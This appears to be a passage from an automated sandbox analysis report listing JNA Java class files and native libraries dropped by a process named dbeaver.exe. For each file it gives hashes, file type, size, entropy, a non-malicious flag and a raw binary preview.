      MD5:FEE004BD88BDA2775759D81A38313AC7
      SHA1:E22111F5B14978021B88311C01E22FE86BF6C5CA
      SHA-256:64B04C8A61402640A3A603E2CC8D1763192FA3AF3E6723DF47263D32BEDC62E0
      SHA-512:0549498D24D8A51C0F9001E2A5806F090801314A8DDE2E8D52E0191C2887FDF362ABCFC535B2FD958A6A0201C4A803D9B6AD3099209E0D166F54AD1440A92D7A
      Malicious:false
      Reputation:unknown
      Preview:.......2.X..'....(....)....*....+....,....-..../....0..1..2....3..4.5....6....7..8.9....:..;.<..=..>...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..'Lcom/sun/jna/ptr/NativeLongByReference;...(Lcom/sun/jna/NativeLong;)V...value...Lcom/sun/jna/NativeLong;...setValue...getValue...()Lcom/sun/jna/NativeLong;...toString...()Ljava/lang/String;...StackMapTable...SourceFile...NativeLongByReference.java...com/sun/jna/NativeLong....?.......@.A....B.......C.D..E..F.G..H.I...NativeLong@0x1$%x=0x%2$x (%2$d)...java/lang/Object..J.K..L..M.N.. .!..O.P..Q..R.S..T.U..V..M.W..%com/sun/jna/ptr/NativeLongByReference...com/sun/jna/ptr/ByReference...(J)V...SIZE...I...(I)V...getPointer...()Lcom/sun/jna/Pointer;...com/sun/jna/Pointer...setNativeLong...(JLcom/sun/jna/NativeLong;)V...getNativeLong...(J)Lcom/sun/jna/NativeLong;...nativeValue...(Lcom/sun/jna/Pointer;)J...java/lang/Long...valueOf...(J)Ljava/lang/Long;...longValue...()J...java/lang/String...format..9(Ljava/lang/String;[Ljava/lan
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):882
      Entropy (8bit):4.991809083196832
      Encrypted:false
      SSDEEP:
      MD5:FCDF8DFEA4FC3323EA22BBCD43B66267
      SHA1:E0ED60EE802925527CF7236FD30E7240EBDE798E
      SHA-256:ABD5C16DBAA3C36187B9CFEAE6CC9115E21DADB419FC75980FEBBBFC720726CF
      SHA-512:529937E0326CBD64DDDE108C7C94BF059B422C9FF803B4B21A94B388E5543C87EBDE09C88994D82B1EF55575F7D57D858263FA2778DE04BC1349FD6538D17111
      Malicious:false
      Reputation:unknown
      Preview:.......2.-............................. ....!.."..#...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..$Lcom/sun/jna/ptr/PointerByReference;...(Lcom/sun/jna/Pointer;)V...value...Lcom/sun/jna/Pointer;...setValue...getValue...()Lcom/sun/jna/Pointer;...SourceFile...PointerByReference.java.......$..%.&....'.......(....)..*.+..(.,.."com/sun/jna/ptr/PointerByReference...com/sun/jna/ptr/ByReference...com/sun/jna/Native...POINTER_SIZE...I...(I)V...getPointer...com/sun/jna/Pointer...setPointer...(JLcom/sun/jna/Pointer;)V...(J)Lcom/sun/jna/Pointer;.!.......................4........*....................$...%...............................I........*......*+...................(...)...*.........................................B........*....+...................-.............................................3........*.......................1............................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1211
      Entropy (8bit):5.208739918021111
      Encrypted:false
      SSDEEP:
      MD5:3DA71D3BA1CF4D18DB0229770DA6B84C
      SHA1:8DF9ABC41954F4D62A5EB09D0E196AE081B82800
      SHA-256:70EFA8D3967F0E7B2E500CD0CA2D8662FDEBF46BF9195D35FC54332525CBFE4E
      SHA-512:3DA9F6A3CBA868E4E2A979B9677CBFA81B34B1BA3235273455A2FAEA846412B4FB7D5FB307C1F60B783DE56EF2424694B4A2FB410F1E894D45E82E362C1A29A7
      Malicious:false
      Reputation:unknown
      Preview:.......2.F....!...."....#....$..%.&..%.'..(..)..%.*..+.,....-..../..0.1..2..3...<init>...()V...Code...LineNumberTable...LocalVariableTable...this.."Lcom/sun/jna/ptr/ShortByReference;...(S)V...value...S...setValue...getValue...()S...toString...()Ljava/lang/String;...SourceFile...ShortByReference.java.........4.......5.6..7..8.9..:.;...short@0x%1$x=0x%2$x (%2$d)...java/lang/Object..<.=..>..?.@.......A..?.B..C..D.E.. com/sun/jna/ptr/ShortByReference...com/sun/jna/ptr/ByReference...(I)V...getPointer...()Lcom/sun/jna/Pointer;...com/sun/jna/Pointer...setShort...(JS)V...getShort...(J)S...nativeValue...(Lcom/sun/jna/Pointer;)J...java/lang/Long...valueOf...(J)Ljava/lang/Long;...java/lang/Short...(S)Ljava/lang/Short;...java/lang/String...format..9(Ljava/lang/String;[Ljava/lang/Object;)Ljava/lang/String;.!.......................4........*........................ ...............................G........*....*....................#...$...%.........................................B........*..........
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 32-bit MSB shared object, SPARC32PLUS, V8+ Required, total store ordering, version 1 (Solaris), dynamically linked, not stripped
      Category:dropped
      Size (bytes):230996
      Entropy (8bit):5.531481560667484
      Encrypted:false
      SSDEEP:
      MD5:4FDB44F7C56C7F06BB835A3C8C9265A2
      SHA1:07B9D6349C56D5DD26C6A67A9C245B7CCDABD8B6
      SHA-256:C44DF08B9C9406C0314BF24273CD29B1D29F38987D40C27D1EBE6DADABF87569
      SHA-512:4E036CF80627C69F74460CB9ECAACD9CD285C0BCA53FCA4FF970C31060D442B4D3C781272297E5BEAFA84F2CDC099D1AEB1D44A3220C422BB207E7730CCBE800
      Malicious:false
      Reputation:unknown
      Preview:.ELF...........................4...T.....4. ...(. ....................-...-...............-...-........................................h............dd.P...............\...\...............F......-.......-............................... ................l........`.......`.......`.......`.....?,`.......o.......o.....=4o.......o......k....... ..............Ix......C.................o......xo.......o...............o.......`.......`......+`..%...........$...........................................................................................;..0X...*......0p......0.......0.......0.......0.......1.......1,......1H......1d......1.......1.......1.......1.......1.......2 ......2<......5.......5(......5D......2.......2.......3.......3.......38......3T......3p......3.......3.......3.......3.......3.......4,......4H......4d......4.......4.......4.......4.......4....$..2l......2.......2.................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit MSB shared object, SPARC V9, total store ordering, version 1 (Solaris), dynamically linked, not stripped
      Category:dropped
      Size (bytes):166976
      Entropy (8bit):5.828939678157912
      Encrypted:false
      SSDEEP:
      MD5:22BD3F226AAF1E5107D9E429CB31C94E
      SHA1:42D4DC3631CD4CB0F2587FB63A330735F6B88179
      SHA-256:1CD8D358B5647BDBEF37146CCB34345E9450EEA918F6B4775CA038897432E926
      SHA-512:EFA5076611DC31B51C11BA88D78B7756EB7CA46799CB0E58A8A65CF9AF057602C634F44FAF9721A0DF2647FA8F5076D5B6E23259D6B132BE442A516B2F21FF18
      Malicious:false
      Reputation:unknown
      Preview:.ELF...............+...................@.......@.....@.8...@. ........................................................................................................!........................ ....... ................................dd.P...................................l.......l.......................................................4..............................................................-.....................................................`...............`..........H....`...............`.........K.....`...............o.........r.....o.........I.....o...............o..........m...............X..............................\...............O................x....................o...............o...............o...............p...............p...............................o...............`...............`..........+....`..%................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 64-bit LSB shared object, x86-64, version 1 (Solaris), dynamically linked, not stripped
      Category:dropped
      Size (bytes):169896
      Entropy (8bit):5.809945152456536
      Encrypted:false
      SSDEEP:
      MD5:8EBA3F0D336F3B93FC7D2BF6DEBE817A
      SHA1:D4626745B9844639471528F7DADAE696BBF40975
      SHA-256:6DAF568A88FC44F7FD97C814BA7E2E6CE2290AAFD7585055EFC0D8BCABE0F099
      SHA-512:95513610BB53EB8D6DD9154406386B0F4C38ED674CC97586B6DD0AF34165D93A1E1447E2742519BF47E9F35DC40B9B087A9A16B28F7ED8338A05226E85591A9C
      Malicious:false
      Reputation:unknown
      Preview:.ELF..............>.............@.......(...........@.8...@.".!......................................................................................................................... ....... .......................................P.dd............................\.......\.......................................................................B...............B...............p2...............V..............R................D.........................`.....8.........`....`..........`...............`....(v.........`...............o....9..........o....Pt.........o...............o....9...............@...............................................(z.........................................o....`/.........o...............o...............................o...............`...............`....>..........................................................................................................................................................................................................;\...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ELF 32-bit LSB shared object, Intel 80386, version 1 (Solaris), dynamically linked, not stripped
      Category:dropped
      Size (bytes):153056
      Entropy (8bit):6.212219185477639
      Encrypted:false
      SSDEEP:
      MD5:7E49FB0E4A08CAE00E5749926F19E450
      SHA1:DE1108E9FE3EC3CA231E736708C872C2F804512A
      SHA-256:D1E83636AF7ECFC426BADFF53BF2C1E15FF2C341BDFCCB06E566A907E5C2366B
      SHA-512:A2ABE8AF409FE68E8B02E596C89F7E579CFEA37B2DF4D692C3789B532C62D852621691C6E55CB18E599867BA7BAF7F4122FCA260B91B81E8599F3A78E4728E84
      Malicious:false
      Reputation:unknown
      Preview:.ELF........................4....P......4. ...(.".!.................X...X...............X...X.......(...T...........................`...............P.dd........................................ .......@...............................$#.............................`.......` ......`.......`0B.....`.......o$}.....oD@.....o.......o9........................H......(F......8..............o.......o.......o...............o.......`.......`>.......X..............................................................................................;....t....@.......@..d....A.......A.......B.......B..0....B..T....B..h....B.......C.......C......LD..(...<E..T....Q......\R.......U.......j..@...<k......|k.......k.......k.......k.......k..4....k..H....k..\....l..p....l......,l.......l.......o..0...,q..h...\q..|....q......\t.......t......lu..P....v.......x.......x.......x.......x.......x.. ....x..L....y..t....y.......y.......z.......z.......{.......{.......|..D....}.......}......,...........0.......`...,...t...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) Aarch64, for MS Windows
      Category:dropped
      Size (bytes):256512
      Entropy (8bit):6.124322431835672
      Encrypted:false
      SSDEEP:
      MD5:1D3902F504DA15AF632C84E5C0219F63
      SHA1:DBB6D15F1C240778BD76715B6EB4254E4712E31F
      SHA-256:29FE4C6371B0B1685909C5B5F69D4976244006F81A2FFC9342A8948BBD8FA8A0
      SHA-512:1122C11A68B236274EF758104327C8E371CC0B8D859C7CF47683006B51B4B51AFEF4FAACB55DBDE7FD3DCA5DAE2A02B439C3F1F0D8C3AB8BCA8535B67F7503E9
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................b........?.....?.....?.................<.....<.....<.....<.....Rich...................PE..d...B..c.........." .........................................................0............`.............................................@... ...<...............H............ ..D...Pm..............................pm..8...............h............................text............................... ..`.rdata..............................@..@.data...x^.......H..................@....pdata..H...........................@..@.reloc..D.... ......................@..B........................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):254464
      Entropy (8bit):6.0953189331442195
      Encrypted:false
      SSDEEP:
      MD5:34D12B1E2AF72D9BB267BBC8C0D53E4A
      SHA1:D9ED8776645F6B4F52DF16132450863C47EA92D7
      SHA-256:13B2CAC3F50368AB97FA2E3B0D0D2CB612F68449D5BBD6DE187FC85EE4469D03
      SHA-512:C0A063477CF63A8B647EA721842968B506D70EA22C586A412707D7293B46C218B6A510F34B7DBEDD3ED29A9D4B5DC5C6A1995403D65884B17348A9545E580A10
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........B...,.,.,...(.,.../.,...)...,.F.).,.F.(.,.F./.,...-.,.-..,.E./.,.E.(.,.,.,.E.,.,.E...,.Rich..,.........PE..d...B..c.........." .........F......T........................................P............`..........................................r..@...P...<....0.......................@...... U..............................@U..8...............p............................text...P........................... ..`.rdata..............................@..@.data...@a.......H...p..............@....pdata..............................@..@_RDATA....... ......................@..@.rsrc........0......................@....reloc.......@......................@..B................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
      Category:dropped
      Size (bytes):211456
      Entropy (8bit):6.575564255266613
      Encrypted:false
      SSDEEP:
      MD5:676F82A561FAFEEC6D8CF6D8319DEE2D
      SHA1:01759BB9E7DD8513C1D25BAFF2C8AB3298DB720D
      SHA-256:1B06CBA48EEA2AD4881BC88A2749E40500DBC87C1A2149290EB61D473A64E4C1
      SHA-512:6E9F4087A49CB15203A6A478C6F3422276018F269ED85833AF6F203604C60C6C443298734CDE217E8DF18EBB932994AAAA3BC794A36419EEBCC4310CAABFB826
      Malicious:false
      Antivirus:
      • Antivirus: ReversingLabs, Detection: 0%
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!:..@T..@T..@T..(W..@T..(Q.S@T..(P..@T..4Q..@T..4P..@T..4W..@T..(U..@T..@U..@T..4W..@T..@T..@T..4P..@T..4T..@T..4V..@T.Rich.@T.........PE..L...6..c...........!.....N..........?R.......`............................................@.............................T...$...<....@.......................P... ..|...................................@............`..0............................text....M.......N.................. ..`.rdata...|...`...~...R..............@..@.data...\Q.......D..................@....rsrc........@......................@....reloc... ...P..."..................@..B................................................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):202
      Entropy (8bit):4.903544568712882
      Encrypted:false
      SSDEEP:
      MD5:6D086F1F0D8C513DCA2EC50F8E6BD3D0
      SHA1:C170FD8CEF9489FCC6BC52D78324E3823BB52FA9
      SHA-256:FDFA3D005A6DA4E0E612B9A08E0E5EC212D72046DADF286EFB15DDA2EDA68A1A
      SHA-512:ED68F4A3724CB89689A1542D0BD4DB3EDC9D8C1F50A2125DA91544871D7690A3E2C875A0E2C69D52B02C3D267F44FBD216F9E00A3F8B74851837C82409EF0BC1
      Malicious:false
      Reputation:unknown
      Preview:.......2..............DLL_FPTRS...I...ConstantValue........SourceFile...DLLCallback.java...com/sun/jna/win32/DLLCallback...java/lang/Object...com/sun/jna/Callback........................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):153
      Entropy (8bit):4.791168538521677
      Encrypted:false
      SSDEEP:
      MD5:59DD05C3EABD896188F4F312F80E7594
      SHA1:94690F48FD9D6BF0F50462C972D54EEE2F0EF58F
      SHA-256:09F9E5B48E873FB8FF2F94DF9408B17CB622267FAFEC695E6157F04703C916A8
      SHA-512:648C37E06687EE41508A681434C2E2AC4C46545111D78F76AEE9199D563FC8196DFD5E286876BABAE0B933C44E4F9E3BEDF0BFCC8A23DC2EC27B5E0904761D15
      Malicious:false
      Reputation:unknown
      Preview:.......2..............SourceFile...StdCall.java...com/sun/jna/win32/StdCall...java/lang/Object.. com/sun/jna/AltCallingConvention........................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):2777
      Entropy (8bit):5.592542911038972
      Encrypted:false
      SSDEEP:
      MD5:8468C3F73499331AE778C947884C1B83
      SHA1:0394C589262BF55ACE7CEDFCBA4B6BE4539B113F
      SHA-256:A2B46B65AE656FC91A96FA8475A51759CAE89FEE0235F617821D10F9952315A4
      SHA-512:E82A888E21835821A430EB2E1319164BFB11D4D48BFD4A596CE2BA8ABE2CA940E9C68D1F11D6879BFF0590363FC985F3B9885F391A7248F84449682531EE6C18
      Malicious:false
      Reputation:unknown
      Preview:.......2......K..L..M.N..O.P..O.Q..M.R..S.T..S.U..V..W....K..X....Y....Z....[....\..].^..]._....`..a....b..c..d.e..f.^..g..h..i..j..k...<init>...()V...Code...LineNumberTable...LocalVariableTable...this..)Lcom/sun/jna/win32/StdCallFunctionMapper;...getArgumentNativeStackSize...(Ljava/lang/Class;)I...e..$Ljava/lang/IllegalArgumentException;...cls...Ljava/lang/Class;...LocalVariableTypeTable...Ljava/lang/Class<*>;...StackMapTable..V...Signature...(Ljava/lang/Class<*>;)I...getFunctionName..I(Lcom/sun/jna/NativeLibrary;Ljava/lang/reflect/Method;)Ljava/lang/String;...func...Lcom/sun/jna/Function;.. Ljava/lang/UnsatisfiedLinkError;...library...Lcom/sun/jna/NativeLibrary;...method...Ljava/lang/reflect/Method;...name...Ljava/lang/String;...pop...I...argTypes...[Ljava/lang/Class;...decorated...conv...[Ljava/lang/Class<*>;..i..l..m..n..?..g...SourceFile...StdCallFunctionMapper.java........com/sun/jna/NativeMapped..o..p.q..r..s.t..u.v..w.x..y..z.=..{.&.."java/lang/IllegalArgumentException...java/l
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):291
      Entropy (8bit):4.976351449460374
      Encrypted:false
      SSDEEP:
      MD5:C49C6432CC4B40AB6FC49542C0B80F1C
      SHA1:4CF291880834BD344FC3C93F7514E3D846B38228
      SHA-256:C7ECF35B90FF2BFF9DDD9AFD6660128594902C2A1FBBCF64DAD5271A77D2EDE4
      SHA-512:7435BE288C4A9D1FAC2D86F326879A55E3A113D73E1EE3643C08DE1C2102A576E67C444B30DD2CEB3B2C7E1B5D01343C404007A3457D69A0FF0B608D8114CAEB
      Malicious:false
      Reputation:unknown
      Preview:.......2.................SourceFile...StdCallLibrary.java.....0com/sun/jna/win32/StdCallLibrary$StdCallCallback...StdCallCallback...InnerClasses...java/lang/Object...com/sun/jna/Callback...com/sun/jna/win32/StdCall.. com/sun/jna/win32/StdCallLibrary..........................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):600
      Entropy (8bit):5.372959828163597
      Encrypted:false
      SSDEEP:
      MD5:3F23FA02010BE7C34FAAD173EE15FC6F
      SHA1:68C1AEB677CEE7DF271AC899CD4A9E9FA7AC7A38
      SHA-256:01AC9F72FF9D85E9479D9239F4EBAC09FC02605A4B712A913A0479A21E71C327
      SHA-512:C98FE5F478D57A1B2CBCDC9D6D98BD23477BF89C237099DC750C375D119942A44B42E4513B5922B8988A6E202D84FCA5FDCFAD646440DA9EC1B9327320261E54
      Malicious:false
      Reputation:unknown
      Preview:.......2.".............................. ...StdCallCallback...InnerClasses...STDCALL_CONVENTION...I...ConstantValue....?...FUNCTION_MAPPER...Lcom/sun/jna/FunctionMapper;...<clinit>...()V...Code...LineNumberTable...SourceFile...StdCallLibrary.java...com/sun/jna/Function..'com/sun/jna/win32/StdCallFunctionMapper..!......... com/sun/jna/win32/StdCallLibrary...java/lang/Object...com/sun/jna/Library...com/sun/jna/win32/StdCall..0com/sun/jna/win32/StdCallLibrary$StdCallCallback...<init>.....................................................#...........Y......................$..........................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1565
      Entropy (8bit):5.494654468319219
      Encrypted:false
      SSDEEP:
      MD5:15007F7170C9187F19F59CD98765CEF9
      SHA1:3AC2B21B01E3008FD2A1AD06080C7C00AD727878
      SHA-256:3B441237775866A1C73D47D30A0C0CC83BF60C46B0C6F92EB7F7AD0CE757542C
      SHA-512:B712F8B7479468E4DC64D6FAD8491608DAE4FCB0C79EBDEBEF12B060E173E2BD2293FF9CE05878C99B134BC767125048867761BB31E68998E2D8689BEE359899
      Malicious:false
      Reputation:unknown
      Preview:.......2.W....4..5..6....7..8.9..:.;..<....4....=....>..?..@.A..B.9..C..D....E....F....G..H..I...UNICODE...Lcom/sun/jna/FunctionMapper;...ASCII...suffix...Ljava/lang/String;...<init>...(Z)V...Code...LineNumberTable...LocalVariableTable...this..(Lcom/sun/jna/win32/W32APIFunctionMapper;...unicode...Z...StackMapTable..D..J...getFunctionName..I(Lcom/sun/jna/NativeLibrary;Ljava/lang/reflect/Method;)Ljava/lang/String;...library...Lcom/sun/jna/NativeLibrary;...method...Ljava/lang/reflect/Method;...name..K..L..C...<clinit>...()V...SourceFile...W32APIFunctionMapper.java....1...W...A.......L..M.N..J..O.P...java/lang/StringBuilder..Q.R..S.N.. com/sun/jna/win32/StdCallLibrary..K..T.U..V...java/lang/UnsatisfiedLinkError..&com/sun/jna/win32/W32APIFunctionMapper..................java/lang/Object...com/sun/jna/FunctionMapper...java/lang/String...com/sun/jna/NativeLibrary...java/lang/reflect/Method...getName...()Ljava/lang/String;...endsWith...(Ljava/lang/String;)Z...append..-(Ljava/lang/String;)Ljava/
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):887
      Entropy (8bit):5.434433580581132
      Encrypted:false
      SSDEEP:
      MD5:D41FC3FCD7CD8B497CCC9125874C1593
      SHA1:90410D0364FFAF2D3B5EDEFD8D31C19D2846D252
      SHA-256:D07349B3AC6CBEA902AB8252AACCE61BEC4427D3D24F085D936DA4941BBCC52C
      SHA-512:76637AA0327742887112DF4DB3CEC567F5E343D0A632AC6048220475FFF05C89AFA63B08FFBA2CBBCF004BB2CA94BD2A52D4B5ABD4A4CAACD6DBEC184F0FD262
      Malicious:false
      Reputation:unknown
      Preview:.......2.0............. .!...."..#..$.%..&..'...serialVersionUID...J...ConstantValue............<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses..#Lcom/sun/jna/win32/W32APIOptions$1;...Signature..9Ljava/util/HashMap<Ljava/lang/String;Ljava/lang/Object;>;...SourceFile...W32APIOptions.java...EnclosingMethod..(...com/sun/jna/Library........type-mapper..)..*.+..,.-...function-mapper.....*./..!com/sun/jna/win32/W32APIOptions$1...java/util/HashMap...com/sun/jna/win32/W32APIOptions.."com/sun/jna/win32/W32APITypeMapper...UNICODE...Lcom/sun/jna/TypeMapper;...put..8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;..&com/sun/jna/win32/W32APIFunctionMapper...Lcom/sun/jna/FunctionMapper;.0.......................................O........*...*........W*........W....................#...$...%..............................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):885
      Entropy (8bit):5.41335345529176
      Encrypted:false
      SSDEEP:
      MD5:6DB0A94A7AC3D36F06BB8C6AA31EBDA9
      SHA1:D23C464A03B0F3CF147268287C7F133083C37A84
      SHA-256:34DDD0775CAB1A46DCBD4C9564140954E052B00A9F31917583F8EB91C3674A50
      SHA-512:00A17CBB14B7B551507F7408F9932CD468864378C3D1EFF1256DFB5D1665A39C0984CE7D3CCD5583DD0B84C97E129AB41CC3EFA0F86E084F474A01CEB347F64E
      Malicious:false
      Reputation:unknown
      Preview:.......2.0............. .!...."..#..$.%..&..'...serialVersionUID...J...ConstantValue............<init>...()V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses..#Lcom/sun/jna/win32/W32APIOptions$2;...Signature..9Ljava/util/HashMap<Ljava/lang/String;Ljava/lang/Object;>;...SourceFile...W32APIOptions.java...EnclosingMethod..(...com/sun/jna/Library........type-mapper..)..*.+..,.-...function-mapper.....*./..!com/sun/jna/win32/W32APIOptions$2...java/util/HashMap...com/sun/jna/win32/W32APIOptions.."com/sun/jna/win32/W32APITypeMapper...ASCII...Lcom/sun/jna/TypeMapper;...put..8(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object;..&com/sun/jna/win32/W32APIFunctionMapper...Lcom/sun/jna/FunctionMapper;.0.......................................O........*...*........W*........W................)...,...-..................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):880
      Entropy (8bit):5.502896505517038
      Encrypted:false
      SSDEEP:
      MD5:C30A8078A5C51E73A34E0D34E4BA224A
      SHA1:C5C3875F082366C6C5E5C0C5C69FBCEC66C4C1BE
      SHA-256:D0214D61AB5004507409133FFE3EEA023B1216C256A6C10F5A6051BDDB01167B
      SHA-512:68E6940F054F0063CAB615DDF0AB8D36A076AB60A9A49C155ABA3FB594EADDCB30A8ADA8D5D94BF4961C438879208B3BB5C0937254E89F701FFB3737E5663166
      Malicious:false
      Reputation:unknown
      Preview:.......2.3............ ....!..".........#..$..%.&....'..(..)..*...InnerClasses...UNICODE_OPTIONS...Ljava/util/Map;...Signature..5Ljava/util/Map<Ljava/lang/String;Ljava/lang/Object;>;...ASCII_OPTIONS...DEFAULT_OPTIONS...<clinit>...()V...Code...LineNumberTable...StackMapTable..+...SourceFile...W32APIOptions.java..!com/sun/jna/win32/W32APIOptions$1..,....-..../.......!com/sun/jna/win32/W32APIOptions$2........w32.ascii..0..1.2........com/sun/jna/win32/W32APIOptions...java/lang/Object.. com/sun/jna/win32/StdCallLibrary...java/util/Map...<init>...java/util/Collections...unmodifiableMap.. (Ljava/util/Map;)Ljava/util/Map;...java/lang/Boolean...getBoolean...(Ljava/lang/String;)Z...........................................................................\......./...Y............Y.................................................)...2........(B.....................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1446
      Entropy (8bit):5.36361481698827
      Encrypted:false
      SSDEEP:
      MD5:8A78C96B63B92EC3752CCFEF6BCF9C44
      SHA1:25683CD1B0507B96D18A9031003117C51FF5CDC5
      SHA-256:77F1427AA274DE0B4FE124E433859460169ED69454A440FE754C5B48926F516F
      SHA-512:2A2CCB8BA395ADE5894052EFD8AA263B54C693AB5B97D480A9E88F24C3B914EC798BBAFF0AF75692C687E652CEC9204D12DDE7A3C78B0EB5051716AB6BACC497
      Malicious:false
      Reputation:unknown
      Preview:.......2.;....)....*..+..,....-......./....0..1..2..3...this$0..$Lcom/sun/jna/win32/W32APITypeMapper;...<init>..'(Lcom/sun/jna/win32/W32APITypeMapper;)V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses..&Lcom/sun/jna/win32/W32APITypeMapper$1;...toNative..C(Ljava/lang/Object;Lcom/sun/jna/ToNativeContext;)Ljava/lang/Object;...value...Ljava/lang/Object;...context...Lcom/sun/jna/ToNativeContext;...StackMapTable...fromNative..E(Ljava/lang/Object;Lcom/sun/jna/FromNativeContext;)Ljava/lang/Object;...Lcom/sun/jna/FromNativeContext;...nativeType...()Ljava/lang/Class;...Signature...()Ljava/lang/Class<*>;...SourceFile...W32APITypeMapper.java...EnclosingMethod..4....5.........6...[Ljava/lang/String;...com/sun/jna/StringArray....7...com/sun/jna/WString..8.9....:..$com/sun/jna/win32/W32APITypeMapper$1...java/lang/Object...com/sun/jna/TypeConverter.."com/sun/jna/win32/W32APITypeMapper...(Z)V...()V...([Ljava/lang/String;Z)V...toString...()Ljava/lang/String;...(Ljava/lang/String;)V.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1442
      Entropy (8bit):5.351233255739138
      Encrypted:false
      SSDEEP:
      MD5:4F86F779D476BE5B4140C1AD58FE0630
      SHA1:A01DAD001179FB9A7946A744A6DFE2A803331092
      SHA-256:94CA25D8E9904139FA557A6394AB79D0587C2007AE38BF00F5BDDA5348DFC8D2
      SHA-512:6240799678A391AE84268C55C4E0A928FD79558CF487D695EE5FA67CB21A5ACA41D9857BF183B659EDF995C4B33D44E80DA7E64B82BB239DA2D727BCEEEE362F
      Malicious:false
      Reputation:unknown
      Preview:.......2.C....*....+..,.-..,....../..0....1..,.2..3..4..5...this$0..$Lcom/sun/jna/win32/W32APITypeMapper;...<init>..'(Lcom/sun/jna/win32/W32APITypeMapper;)V...Code...LineNumberTable...LocalVariableTable...this...InnerClasses..&Lcom/sun/jna/win32/W32APITypeMapper$2;...toNative..C(Ljava/lang/Object;Lcom/sun/jna/ToNativeContext;)Ljava/lang/Object;...value...Ljava/lang/Object;...context...Lcom/sun/jna/ToNativeContext;...StackMapTable...fromNative..E(Ljava/lang/Object;Lcom/sun/jna/FromNativeContext;)Ljava/lang/Object;...Lcom/sun/jna/FromNativeContext;..6...nativeType...()Ljava/lang/Class;...Signature...()Ljava/lang/Class<*>;...SourceFile...W32APITypeMapper.java...EnclosingMethod..7....8.........9..6..:.;..<.=..>.?...java/lang/Integer..@.A..B.;..$com/sun/jna/win32/W32APITypeMapper$2...java/lang/Object...com/sun/jna/TypeConverter...java/lang/Boolean.."com/sun/jna/win32/W32APITypeMapper...(Z)V...()V...TRUE...Ljava/lang/Boolean;...equals...(Ljava/lang/Object;)Z...valueOf...(I)Ljava/lang/Integer
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:compiled Java class data, version 50.0 (Java 1.6)
      Category:dropped
      Size (bytes):1287
      Entropy (8bit):5.53347270039791
      Encrypted:false
      SSDEEP:
      MD5:45DAE053FE3A5B59175BC396BD524117
      SHA1:96FE9D5684C6DACB0EE9383E5120326D2D43FC07
      SHA-256:11754844A930BF98BE971E3012309E80E10A928D4C7D1545D9EFCC22FEE686BA
      SHA-512:87C03E9DBD8057C1DDBB3F4693B837CE8667AF4135B0384014529A41A4368B80BDA7F763678343E0D9247847E7814F84A8A7A29B16E05C6F933A57417D83B517
      Malicious:false
      Reputation:unknown
